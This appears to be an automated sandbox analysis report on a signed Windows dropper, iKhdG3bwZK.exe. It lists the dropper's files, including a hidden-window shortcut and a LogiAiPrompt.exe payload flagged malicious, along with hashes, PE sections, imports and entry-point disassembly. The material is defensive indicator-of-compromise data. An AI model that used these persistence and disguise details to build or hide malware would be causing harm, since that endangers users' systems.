                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1056
                                                  Entropy (8bit):6.343639101336781
                                                  Encrypted:false
                                                  SSDEEP:24:YFLt1nffIQSm2mz1dTPDKz0G6tIv/5lHGi1di+eO:YTZfgXmfBDKz0G6Wv/PmNq
                                                  MD5:BF2C65C2451D39AC7E0D24279D9D3393
                                                  SHA1:CF1427BEA5132D90E09A3385C4622617E80E346F
                                                  SHA-256:624526C1A5484697ABCDA7B18AC1DB3192D4EF54C94289B311F93B902A89D0EF
                                                  SHA-512:A60177EF5A191C87518D6A2B17526A9C08BB48132998D3F30371809782AC224A027C9E989A214C57BA363D0F902812855E1EC277CD89F43B56252356A63280FF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.=.W.* ..']&.'.^S0.,AQ(,L.\-].W.X." M../Q!..@.0.Q5Z$Z).\\<8WM_;.X!..^7.7U<..S...].?-S[[.Y1U9^3_3R? .F....^...7... 6.A"\/...6.$$..*Z^.7"..!9..><.N.!..".......-6%...5....N-.....V..+_.+\V.W+(.<\&.........2.1O.9..-0..0?..+.0.4..T6P.L.<.F.0.Z.. U&#<G0..V.._M5(.[..^]Q..U...GVS.XW/+R.."SRQ-]...S'+/Y.-&^<..R.>.F.P..U._.....S.&A.&..X:3.+T6.6P......R.Y....N.)...R.."87.....R-,.3$3N.V..^.V.3._..?4.+"(.?]..-....4_.>Q.O.....%..-9/.).4....TRP.L...F.[.W.(.R84,G^Z.\5.)R+.<[R..@2..R .._...X4?PM../P.1._V\>Y.VTZ-.=^U.!S.;SY.6._^.>L..W.W.'.!X..:.5FT'_.)."...6.QP..4^+...)..2.C .).-=U.=...!....#%....C..+.;V..25].>.......4&Z..+...8$....B".V..&W.-W7..$..!..S.S$A.!2L).TX55-V.. [<..G..._.\.P...Y..8@ XQQ..QY.%;X...M_7U[.W^Z.Z!P.-.S=3.]<$4S^.#Y1&5^+&.R."SF-...5_%.V>W....A./....-..&..P...;&...)..2.2N.....3"..1......"'..2.#N.=(.(9(.>>,...*.TP..RX5.[<...9..5.5O.\^.?...+%*.#.?.P..T6.0LV-.F.).]..6[9.UG.S+_0>S[.).Y7.[@4Y.Q5.RY..Y[.#.M%47X..8X.^.W]'.S.4"].!(S>].Y.&,^".?R$Z4F....*.....S.!..AP?1.8...*"7.Q'!..&W..,?.1.6N_?.
                                                  Process:C:\Windows\SysWOW64\more.com
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:34 2023, mtime=Mon Nov 25 06:32:11 2024, atime=Mon Nov 25 06:32:08 2024, length=21120968, window=hide
                                                  Category:dropped
                                                  Size (bytes):894
                                                  Entropy (8bit):5.0913841888563285
                                                  Encrypted:false
                                                  SSDEEP:12:89YNsW4Xl0WCl7dY//jsML4W87iK+6X0zK50qAjAo8rHq8UJPyQ9NnBmV:89YNWXtm7+YeHciKOKmqUADQAQTBm
                                                  MD5:2B87B2A0832CE9F5A594018ED0B5B97E
                                                  SHA1:6E9ACD6DB84EBFBE724C633791F4942DA1E2A34C
                                                  SHA-256:997C8DAA35C1DBA1C7AC2F6183E29CD149D202CC4A6FA8CBAB658FC26C673C9F
                                                  SHA-512:38220BD22F4BF4D962C051DDB9561946DF675037122E61143FCDBA21A69F540455534BA86A0250D7801CD0D14222A0DABD0B150BC918AA6DCC95B57289F55F1B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:L..................F.... ...........^$.?..f .".?...GB.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....w...?..h..-.?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY.<...........................%..A.p.p.D.a.t.a...B.V.1.....yY.<..Roaming.@......CW.^yY.<..........................B...R.o.a.m.i.n.g.....T.1.....yY.<..docker..>......yY.<yY.<..........................Pdq.d.o.c.k.e.r.....n.2..GB.yY.< .LOGIAI~1.EXE..R......DWR`yY.<.............................L.o.g.i.A.i.P.r.o.m.p.t...e.x.e.......e...............-.......d............U.......C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe..%.....\.....\.R.o.a.m.i.n.g.\.d.o.c.k.e.r.\.L.o.g.i.A.i.P.r.o.m.p.t...e.x.e.`.......X.......841618...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                  Process:C:\Windows\SysWOW64\more.com
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):7652352
                                                  Entropy (8bit):6.189526325831481
                                                  Encrypted:false
                                                  SSDEEP:98304:4xD6PvPXh9+WHw6vySOuGGeXlufF3hSw6:A6GAfF3hZ6
                                                  MD5:7F4D907F2E049203300A3E4FF50C0F0F
                                                  SHA1:C48A6C89000F24EF642F1FD7E96E5A00AA590B0A
                                                  SHA-256:1FDBBD54D17B341CEB3DFBD230693633CBE12B4CED5C5F60562C07629426FA2E
                                                  SHA-512:076CA22C047706183A8EF7972CEA33E8FF021CACB82F95B3C035E00BBDF19A75D3357F4CB479BABD02DCC4B76FBFE466B4074A03A3C5DBA67B384B038EE7DE85
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:b..t..............pG.........0........`o...@..........................Px...........@...................................u.^.............................u.....................................................@`o..............................text...CnG......pG................. ..`.rdata....'...G...'..tG.............@..@.data........`o......No.............@....idata..^.....u.......r.............@....reloc........u.......r.............@..B.symtab......0x.......t................Blubvlv.......@x.......t.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.730975588873266
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:iKhdG3bwZK.exe
                                                  File size:21'120'968 bytes
                                                  MD5:044037796cf2d13eadf0217833d52e65
                                                  SHA1:b2e117be2c836ad18d1edccdd440fe44587b1386
                                                  SHA256:1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211
                                                  SHA512:07f46cdef3dcf3b0b3207f0ef1585ab31407d0125e757f5610b5555bcd769a95627bc4b16d2a871f8dd916a9e9820c355364db83657ba2fdbcc7708b4c76e285
                                                  SSDEEP:393216:AbsUHRpnmyn4GjMSxQodsMIzmRr+wtrXzzwgCh0IO:PajaSx9dvI6RiCrXzEguO
                                                  TLSH:B5270212B384613AE46F2E3A0877FB14683F7F617A12CE9B66F4198C4F35640693A747
                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                  Icon Hash:983c3db5240e86b0
                                                  Entrypoint:0x95a61c
                                                  Entrypoint Section:.itext
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6723E648 [Thu Oct 31 20:19:20 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:b6e2dc6fda6a433b890df57ef17fcdad
                                                  Signature Valid:false
                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA ECC R2, O=SSL Corp, L=Houston, S=Texas, C=US
                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                  Error Number:-2146762495
                                                  Not Before, Not After
                                                  • 18/11/2024 09:47:36 18/11/2025 09:47:36
                                                  Subject Chain
                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=UA, OID.2.5.4.15=Private Organization, CN=TRADE TRUST LLC, SERIALNUMBER=37058412, O=TRADE TRUST LLC, L=Dnipro, C=UA
                                                  Version:3
                                                  Thumbprint MD5:534B9DBCF3BB2DFA2DAD06DA0709841E
                                                  Thumbprint SHA-1:FEA61825376A364886B5236EFCB3EDD1B23E9441
                                                  Thumbprint SHA-256:BD193172C9C4775190F1C906FF5B47D9FB1A342DB35AC211A1A4AC8A9B07B914
                                                  Serial:4C46DCF5B0C4357F05806830DBA932FD
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  add esp, FFFFFFF0h
                                                  mov eax, 009499A0h
                                                  call 00007FEE78F04BCDh
                                                  push 0095A690h
                                                  push 00000000h
                                                  push 00000000h
                                                  call 00007FEE78F0D6B3h
                                                  mov eax, dword ptr [00984788h]
                                                  mov eax, dword ptr [eax]
                                                  call 00007FEE7915932Bh
                                                  mov eax, dword ptr [00984788h]
                                                  mov eax, dword ptr [eax]
                                                  mov dl, 01h
                                                  call 00007FEE7915B091h
                                                  mov eax, dword ptr [00984788h]
                                                  mov eax, dword ptr [eax]
                                                  mov edx, 0095A6C4h
                                                  call 00007FEE79158D40h
                                                  mov ecx, dword ptr [00983B98h]
                                                  mov eax, dword ptr [00984788h]
                                                  mov eax, dword ptr [eax]
                                                  mov edx, dword ptr [0093DB34h]
                                                  call 00007FEE7915930Ch
                                                  mov eax, dword ptr [00984788h]
                                                  mov eax, dword ptr [eax]
                                                  call 00007FEE7915945Ch
                                                  call 00007FEE78EFD15Bh
                                                  add byte ptr [eax], al
                                                  push esi
                                                  add byte ptr [edi+00h], cl
                                                  push esi
                                                  add byte ptr [ebx+00h], dl
                                                  dec edi
                                                  add byte ptr [esi+00h], al
                                                  push esp
                                                  add byte ptr [edi+00h], bl
                                                  dec edi
                                                  add byte ptr [ebx+00h], al
                                                  push edx
                                                  add byte ptr [edi+00h], bl
                                                  push edx
                                                  add byte ptr [ebp+00h], ah
                                                  popad
                                                  add byte ptr [eax+eax+65h], ah
                                                  add byte ptr [edx+00h], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  mov al, 04h
                                                  add al, byte ptr [eax]
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x5b50000x9b.edata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5b00000x3fb4.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x62c0000x8c315f.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1423e200x9a8
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5b80000x73578
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x5b70000x18.rdata
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x5b0b400x9c4.idata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5b40000xe0c.didata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x555f3c0x556000b868ff41d834a79e3ab8f06eab91c354unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .itext0x5570000x36dc0x38000bb7f143683bd16e9cc0acf14f5bbdbeFalse0.5050223214285714data6.193752938323276IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .data0x55b0000x2a1240x2a20081ebc99bdbebf50964ed0ee8898cd7c6False0.30702313612759646data6.082270971376258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .bss0x5860000x2909c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata0x5b00000x3fb40x400043b0270b4d110befabad4bfb8ad09823False0.33038330078125data5.274523560388854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .didata0x5b40000xe0c0x1000cbadc12bfca41b6c546ed38a9ab4bf5fFalse0.303466796875data4.014333875326934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .edata0x5b50000x9b0x2006320216ec133fefb1dabea8863b50092False0.2578125data1.8947667592796267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .tls0x5b60000x780x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rdata0x5b70000x5d0x200eebedb4f5f94c0780b03eb36a0c3f1faFalse0.189453125data1.370020541144142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x5b80000x735480x736006490c892a1409126502f290121f8feb7False0.561054729821235data6.7157772047360105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x62c0000x8c315f0x8c3200d18d36d4825d0eefbe8dadb3cdd0625eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  FG0x62d5400x7b2860PNG image data, 1568 x 6367, 8-bit/color RGB, non-interlacedEnglishUnited States0.9949522018432617
                                                  RT_CURSOR0xddfda00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                  RT_CURSOR0xddfed40x134dataEnglishUnited States0.4642857142857143
                                                  RT_CURSOR0xde00080x134dataEnglishUnited States0.4805194805194805
                                                  RT_CURSOR0xde013c0x134dataEnglishUnited States0.38311688311688313
                                                  RT_CURSOR0xde02700x134dataEnglishUnited States0.36038961038961037
                                                  RT_CURSOR0xde03a40x134dataEnglishUnited States0.4090909090909091
                                                  RT_CURSOR0xde04d80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                  RT_BITMAP0xde060c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                  RT_BITMAP0xde07dc0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                  RT_BITMAP0xde09c00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                  RT_BITMAP0xde0b900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                  RT_BITMAP0xde0d600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                  RT_BITMAP0xde0f300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                  RT_BITMAP0xde11000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                  RT_BITMAP0xde12d00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                  RT_BITMAP0xde14a00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                  RT_BITMAP0xde16700x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                  RT_BITMAP0xde18400xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                  RT_BITMAP0xde19280x378Device independent bitmap graphic, 110 x 14 x 4, image size 7840.23085585585585586
                                                  RT_BITMAP0xde1ca00xd8Device independent bitmap graphic, 15 x 14 x 4, image size 112, resolution 2834 x 2834 px/m0.4675925925925926
                                                  RT_ICON0xde1d780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2834 x 2834 px/mEnglishUnited States0.4857050921679439
                                                  RT_DIALOG0xe23da00x52data0.7682926829268293
                                                  RT_DIALOG0xe23df40x52data0.7560975609756098
                                                  RT_STRING0xe23e480x298data0.44126506024096385
                                                  RT_STRING0xe240e00x42cdata0.3202247191011236
                                                  RT_STRING0xe2450c0x400data0.392578125
                                                  RT_STRING0xe2490c0x4b8data0.4105960264900662
                                                  RT_STRING0xe24dc40x1200data0.1853298611111111
                                                  RT_STRING0xe25fc40x8ecdata0.3397548161120841
                                                  RT_STRING0xe268b00x974data0.3202479338842975
                                                  RT_STRING0xe272240x91cdata0.26286449399656947
                                                  RT_STRING0xe27b400x63cdata0.33395989974937346
                                                  RT_STRING0xe2817c0x1f0data0.4435483870967742
                                                  RT_STRING0xe2836c0x5d4data0.3445040214477212
                                                  RT_STRING0xe289400x39cdata0.4253246753246753
                                                  RT_STRING0xe28cdc0x46cAmigaOS bitmap font "e", fc_YSize 18176, 20992 elements, 2nd "\034", 3rd "x"0.39664310954063603
                                                  RT_STRING0xe291480x320data0.42375
                                                  RT_STRING0xe294680x4a0data0.3918918918918919
                                                  RT_STRING0xe299080x38cdata0.44162995594713655
                                                  RT_STRING0xe29c940x398data0.3423913043478261
                                                  RT_STRING0xe2a02c0x2acdata0.46345029239766083
                                                  RT_STRING0xe2a2d80x308data0.41494845360824745
                                                  RT_STRING0xe2a5e00x2ecdata0.42914438502673796
                                                  RT_STRING0xe2a8cc0x448data0.36496350364963503
                                                  RT_STRING0xe2ad140x8b4data0.3016157989228007
                                                  RT_STRING0xe2b5c80xae4data0.2309899569583931
                                                  RT_STRING0xe2c0ac0x4dcdata0.3729903536977492
                                                  RT_STRING0xe2c5880x408data0.31589147286821706
                                                  RT_STRING0xe2c9900x3c4data0.41804979253112035
                                                  RT_STRING0xe2cd540x400data0.4140625
                                                  RT_STRING0xe2d1540x48cdata0.39261168384879724
                                                  RT_STRING0xe2d5e00x1b0data0.5532407407407407
                                                  RT_STRING0xe2d7900xccdata0.6666666666666666
                                                  RT_STRING0xe2d85c0x17cdata0.5368421052631579
                                                  RT_STRING0xe2d9d80x254data0.4865771812080537
                                                  RT_STRING0xe2dc2c0x390data0.38706140350877194
                                                  RT_STRING0xe2dfbc0x3c4data0.38070539419087135
                                                  RT_STRING0xe2e3800x448data0.3613138686131387
                                                  RT_STRING0xe2e7c80x4c4data0.31721311475409836
                                                  RT_STRING0xe2ec8c0x2c4data0.3559322033898305
                                                  RT_STRING0xe2ef500x40cdata0.3996138996138996
                                                  RT_STRING0xe2f35c0x4b8data0.3509933774834437
                                                  RT_STRING0xe2f8140x698data0.3033175355450237
                                                  RT_STRING0xe2feac0x4a0data0.3293918918918919
                                                  RT_STRING0xe3034c0x394data0.38318777292576417
                                                  RT_STRING0xe306e00x400data0.37890625
                                                  RT_STRING0xe30ae00x350data0.3867924528301887
                                                  RT_STRING0xe30e300xd4data0.5283018867924528
                                                  RT_STRING0xe30f040xa4data0.6524390243902439
                                                  RT_STRING0xe30fa80x2dcdata0.46311475409836067
                                                  RT_STRING0xe312840x458data0.29856115107913667
                                                  RT_STRING0xe316dc0x31cdata0.42462311557788945
                                                  RT_STRING0xe319f80x2e8data0.3736559139784946
                                                  RT_STRING0xe31ce00x34cdata0.3068720379146919
                                                  RT_RCDATA0xe3202c0x10data1.5
                                                  RT_RCDATA0xe3203c0x1308data0.4755747126436782
                                                  RT_RCDATA0xe333440x2dataEnglishUnited States5.0
                                                  RT_RCDATA0xe333480x2355bDelphi compiled form 'TAboutBox'0.9526293606760128
                                                  RT_RCDATA0xe568a40x2dbDelphi compiled form 'TAdForm'0.6238030095759234
                                                  RT_RCDATA0xe56b800x1b0e3Delphi compiled form 'TAppForm'0.7625046246582264
                                                  RT_RCDATA0xe71c640x3831Delphi compiled form 'TFeedbackForm'0.47493917274939174
                                                  RT_RCDATA0xe754980xac6Delphi compiled form 'TFormPDF'0.4126178390137781
                                                  RT_RCDATA0xe75f600x7caeDelphi compiled form 'TNagScreen'0.6467823798483614
                                                  RT_RCDATA0xe7dc100xcf8Delphi compiled form 'TNewVer'0.563855421686747
                                                  RT_RCDATA0xe7e9080x6fd6cDelphi compiled form 'TTranslateForm'0.15776743536232896
                                                  RT_GROUP_CURSOR0xeee6740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                  RT_GROUP_CURSOR0xeee6880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                  RT_GROUP_CURSOR0xeee69c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                  RT_GROUP_CURSOR0xeee6b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                  RT_GROUP_CURSOR0xeee6c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                  RT_GROUP_CURSOR0xeee6d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                  RT_GROUP_CURSOR0xeee6ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                  RT_GROUP_ICON0xeee7000x14dataEnglishUnited States1.1
                                                  RT_VERSION0xeee7140x340dataEnglishUnited States0.43149038461538464
                                                  RT_MANIFEST0xeeea540x70bXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.403771491957848
                                                  DLLImport
                                                  usp10.dllScriptGetProperties, ScriptItemize, ScriptShape, ScriptLayout, ScriptApplyDigitSubstitution
                                                  winmm.dllsndPlaySoundW, timeGetTime
                                                  oleacc.dllLresultFromObject
                                                  winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                                                  comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  comctl32.dllImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                                                  shell32.dllDragFinish, DragQueryPoint, DragQueryFileW, DragQueryFileA, DragAcceptFiles, Shell_NotifyIconW, ShellExecuteW
                                                  user32.dllCopyImage, SetMenuItemInfoW, GetMenuItemInfoW, SetCaretPos, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, DestroyCaret, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetAsyncKeyState, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, NotifyWinEvent, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsCharAlphaW, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, AnimateWindow, SetTimer, WindowFromPoint, BeginPaint, DrawStateW, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, CharLowerA, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, CreateCaret, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, CharUpperA, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, CharNextA, FindWindowW, GetKeyboardLayout, DeleteMenu
                                                  version.dllGetFileVersionInfoSizeW, VerQueryValueW, VerQueryValueA, GetFileVersionInfoW
                                                  oleaut32.dllGetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
                                                  advapi32.dllRegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, GetUserNameW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
                                                  netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                  msvcrt.dllisupper, isalpha, isalnum, toupper, memchr, memcmp, memcpy, memset, isprint, isspace, iscntrl, isxdigit, ispunct, isgraph, islower, tolower
                                                  winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
